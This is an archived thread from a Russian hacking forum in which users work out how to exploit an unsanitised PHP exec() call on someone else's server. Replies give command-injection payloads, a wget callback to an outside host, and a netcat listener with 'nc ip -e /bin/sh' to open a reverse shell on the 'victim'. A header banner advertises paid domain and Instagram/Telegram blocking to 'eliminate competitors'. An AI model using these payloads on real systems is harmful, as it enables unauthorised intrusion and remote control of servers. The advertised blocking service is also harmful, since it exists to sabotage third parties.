УСТРАНЕНИЕ КОНКУРЕНТОВ. БЛОКИРОВКА ДОМЕНОВ, БЛОКИРОВКА ИНСТАГРАМ/ТЕЛЕГРАМ И ДРУГОЕ. ПРОВЕРЕННЫЙ СЕЛЛЕР.

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.

		Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
exec без escapeshellarg

Опции темы

Поиск в этой теме

Опции просмотра

02.10.2011, 21:29

TRUE_GEEK

Guest

Сообщений: n/a

Провел на форуме:
2057

Репутация: 0

Недавно ковырял один php код и нашел интересную строку:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]exec[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#DD0000"]"grep -i \"[/COLOR][COLOR="#0000BB"]$search[/COLOR][COLOR="#DD0000"]\" base.dat"[/COLOR][COLOR="#007700"],[/COLOR][COLOR="#0000BB"]$execAr[/COLOR][COLOR="#007700"]);[/COLOR][/COLOR]

при этом перемененная search ни где не фильтруется

я попробовал сначала так:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]any search[/COLOR][COLOR="#DD0000"]" base.dat; echo "[/COLOR][COLOR="#0000BB"]unknown error[/COLOR][COLOR="#DD0000"]" > err.log #[/COLOR][/COLOR]

но err.log не создался

тогда я попробовал так:

PHP код:


		
			
PHP:
[COLOR="#000000"][COLOR="#0000BB"]any search[/COLOR][COLOR="#DD0000"]" base.dat; echo "[/COLOR][COLOR="#0000BB"]категрия[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]название[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]single[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]a45cab8f313e7b[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]|[/COLOR][COLOR="#0000BB"]0[/COLOR][COLOR="#007700"]||[/COLOR][COLOR="#0000BB"]instock[/COLOR][COLOR="#007700"]|||[/COLOR][COLOR="#0000BB"]описание[/COLOR][COLOR="#007700"]\[/COLOR][COLOR="#0000BB"]n[/COLOR][COLOR="#DD0000"]" #[/COLOR][/COLOR]

но результат не изменился, хотя если echo выполнилось, то моя строчка должна была попасть execAr и вывестись в результатах поиска

подскажите как юзать, а то я линух только на картинках видел

02.10.2011, 23:43

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

попробуй так

Код:

Code:
`id>log.txt`

03.10.2011, 19:42

TRUE_GEEK

Guest

Сообщений: n/a

Провел на форуме:
2057

Репутация: 0

не так не получилось, попробовал `wget http://httpz.ru/nktvzvbkabw.gif?hello+world`, работает, узнал, что это red hat, как мне теперь id переслать ?

03.10.2011, 21:50

chekist

Reservists Of Antichat - Level 6

Регистрация: 14.11.2007

Сообщений: 177

Провел на форуме:
1246854

Репутация: 622

тогда понятно, у тебя нет прав на запись в текущую директорию, ищи диру доступную для запись

либо проще

на своём серваке сделай

nc -n -vv -l -p 9999

на жертве

`nc ip_tvoego_serva 9999 -e /bin/sh`